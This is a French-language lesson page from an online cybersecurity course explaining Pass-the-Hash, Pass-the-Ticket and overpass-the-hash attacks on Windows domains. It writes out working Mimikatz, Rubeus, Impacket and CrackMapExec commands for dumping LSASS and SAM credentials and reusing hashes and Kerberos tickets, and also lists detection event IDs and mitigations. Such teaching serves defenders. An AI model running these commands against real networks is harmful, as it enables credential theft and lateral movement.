Cyber Security Academy · Leçon

Attaques Pass-the-Hash et Pass-the-Ticket

Utilisez des hachages d’identifiants et des tickets Kerberos pour vous déplacer latéralement sans connaître les mots de passe en clair.

Leçon 2 sur 413 étapes

Attaques Pass-the-Hash et Pass-the-Ticket est une leçon Cyber Security Academy gratuite sur CoddyKit. Ceci est la leçon 2 sur 4. Tu peux lire la leçon complète ci-dessous gratuitement — puis la pratiquer en direct dans le navigateur avec un éditeur de code intégré et un tuteur IA 24/7. Elle fait partie du parcours d'apprentissage Cyber Security Academy, et ta progression se synchronise sur le web et l'application CoddyKit. Le cours Cyber Security Academy comprend 4 leçons au total.

Pourquoi ces attaques existent

Les protocoles d’identification Windows stockent les secrets d’authentification (hachages NTLM et tickets Kerberos) en mémoire. Un attaquant disposant de privilèges SYSTEM peut extraire ces secrets et les réutiliser pour s’authentifier en tant que d’autres utilisateurs sans connaître leurs mots de passe.

Extraction de hachages NTLM avec Mimikatz

Mimikatz est l’outil de référence pour extraire les identifiants sous Windows. Exécuté avec les privilèges SYSTEM ou administrateur, il lit la mémoire du processus LSASS afin d’en extraire les hachages NTLM et les identifiants en clair.

# Run mimikatz as Admin:
mimikatz.exe

# Enable debug privilege
privilege::debug

# Dump LSASS credentials
sekurlsa::logonpasswords

# Dump local SAM hashes
lsadump::sam

Réutilisation du hachage (PtH) avec Mimikatz

Le PtH injecte un hachage NTLM dans une nouvelle session sans connaître le mot de passe en clair. Le hachage permet de s’authentifier auprès de services distants à l’aide de NTLM — ce qui est efficace pour se déplacer latéralement vers d’autres hôtes Windows.

# Pass-the-Hash with Mimikatz:
sekurlsa::pth /user:Administrator /domain:CORP \
  /ntlm:aad3b435b51404eeaad3b435b51404ee \
  /run:cmd.exe

# Opens cmd.exe authenticated as that user

Réutilisation du hachage avec Impacket

Impacket fournit des outils Python pour le PtH : psexec.py, smbexec.py et wmiexec.py acceptent directement les hachages NTLM pour exécuter des commandes à distance.

# psexec with hash (Linux → Windows)
psexec.py CORP/Administrator@192.168.1.100 \
  -hashes aad3b435...:8846f7eaee8fb117...

# wmiexec
wmiexec.py CORP/Admin@192.168.1.100 \
  -hashes :8846f7eaee8fb117ad06bdd830b7586c

Extraction de tickets Kerberos

Les tickets Kerberos sont également stockés dans la mémoire de LSASS. Mimikatz permet de les extraire ; Rubeus est l’outil spécialisé dans les opérations sur les tickets Kerberos sous Windows.

# Mimikatz: export all tickets
sekurlsa::tickets /export

# Rubeus: list tickets
Rubeus.exe triage

# Rubeus: dump specific ticket
Rubeus.exe dump /luid:0x3e7 /service:krbtgt

Réutilisation d’un ticket (PtT)

Le PtT injecte un ticket Kerberos volé dans la session actuelle. Le ticket permet de s’authentifier auprès des services en tant que son propriétaire initial — aucun hachage ni mot de passe n’est nécessaire.

# Mimikatz: inject ticket
kerberos::ptt ticket.kirbi

# Rubeus: inject ticket
Rubeus.exe ptt /ticket:ticket.kirbi

# Verify injection
klist

Extraction distante de LSASS

À partir d’un point d’appui, extrayez LSASS à distance avec CrackMapExec ou secretsdump d’Impacket — aucune session interactive sur la cible n’est nécessaire.

# CrackMapExec
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --sam
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --lsa

# Impacket secretsdump
secretsdump.py CORP/Admin:Password123@192.168.1.100

Chemins de déplacement latéral

Après avoir obtenu des hachages ou des tickets, déplacez-vous latéralement : utilisez le PtH vers d’autres machines en réutilisant les comptes d’administrateur local, le PtT pour accéder aux services du domaine, puis progressez vers le statut d’administrateur de domaine en ciblant les comptes privilégiés.

Détection du PtH et du PtT

Les défenseurs détectent le PtH grâce aux éléments suivants : ID d’événement 4624 (ouverture de session) avec le type d’ouverture de session 3 et sans ouverture de session interactive correspondante, anomalies d’authentification NTLM et signatures de Mimikatz en mémoire ou sur disque.

# Detection event IDs:
# 4624: Logon (look for type 3 = network)
# 4776: NTLM auth (watch for unexpected hosts)
# 4769: Service ticket request (Kerberos)
# 4648: Explicit credential use

Mesures d’atténuation

Les principales mesures d’atténuation sont les suivantes : activez la protection des identifiants (qui protège LSASS par virtualisation), limitez la réutilisation des comptes d’administrateur local entre les machines (LAPS), imposez le groupe Utilisateurs protégés pour les comptes privilégiés et désactivez NTLM lorsque c’est possible.

Passage du hachage à Kerberos

Le passage du hachage convertit un hachage NTLM en TGT Kerberos. Cette technique est utile dans les environnements où NTLM est bloqué mais où Kerberos est disponible, ou lorsque vous avez besoin d’un TGT pour poursuivre d’autres attaques Kerberos.

# Mimikatz: overpass-the-hash
sekurlsa::pth /user:Admin /domain:CORP \
  /ntlm:8846f7eaee8fb117ad06bdd830b7586c \
  /run:powershell.exe

# Then in new session:
Rubeus.exe asktgt /user:Admin /rc4:8846f7ea...

Vérification rapide

Quelle fonctionnalité de sécurité Windows protège le stockage des identifiants de LSASS grâce à la virtualisation ?

Résumé : PtH et PtT

La réutilisation du hachage et celle du ticket constituent le fondement du déplacement latéral dans Active Directory. Toutes deux exploitent la mise en cache des identifiants Windows dans LSASS. Mimikatz et Impacket rendent leur extraction et leur réutilisation triviales. Défendez-vous avec la protection des identifiants, LAPS, le groupe Utilisateurs protégés et une surveillance stricte des événements d’authentification NTLM et Kerberos.

Gratuit pour commencer

Apprends Cyber Security Academy avec un tuteur IA — gratuit

Écris et exécute du vrai code dans ton navigateur, obtiens de l'aide instantanée d'un tuteur IA disponible 24h/24, et reprends là où tu t'es arrêté sur le web ou dans l'app.

Cours
76
Leçons
303

Questions Fréquemment Posées

La leçon « Attaques Pass-the-Hash et Pass-the-Ticket » est-elle gratuite ?

Oui — le texte complet de « Attaques Pass-the-Hash et Pass-the-Ticket » est gratuit à lire ici sur le web. Pour la pratiquer de manière interactive (un éditeur de code intégré et un tuteur IA 24/7) et déverrouiller le reste du cours Cyber Security Academy, passe à CoddyKit PRO. Le cours Cyber Security Academy comprend 4 leçons au total.

Qu'est-ce que j'apprendrai dans « Attaques Pass-the-Hash et Pass-the-Ticket » ?

Utilisez des hachages d’identifiants et des tickets Kerberos pour vous déplacer latéralement sans connaître les mots de passe en clair. Tu pratiques Cyber Security Academy avec du code pratique que tu exécutes directement dans le navigateur, et un tuteur IA 24/7 répond à tes questions au fur et à mesure que tu avances dans la leçon.

Dois-je avoir de l'expérience pour commencer Cyber Security Academy ?

Aucune expérience préalable n'est requise. Cyber Security Academy sur CoddyKit est structuré pour les débutants jusqu'aux apprenants avancés, donc tu peux commencer ici ou depuis le début et avancer à ton rythme. Ceci est la leçon 2 sur 4.

Combien de temps prend la leçon « Attaques Pass-the-Hash et Pass-the-Ticket » ?

La plupart des leçons CoddyKit prennent environ 5–10 minutes. Chacune est courte et interactive, tu progresses régulièrement et tu repiques exactement où tu t'es arrêté sur le web et l'app.

Peux-tu écrire et exécuter du code dans cette leçon Cyber Security Academy ?

Oui. Chaque leçon Cyber Security Academy inclut un éditeur de code intégré, tu écris et exécutes du vrai code directement dans ton navigateur et tu reçois des retours IA instantanés — aucune configuration locale requise.

Toutes les leçons de ce cours

  1. Authentification Windows : NTLM et Kerberos
  2. Attaques Pass-the-Hash et Pass-the-Ticket
  3. Kerberoasting et AS-REP Roasting
  4. Renforcement de la sécurité d’Active Directory
← Retour à Cyber Security Academy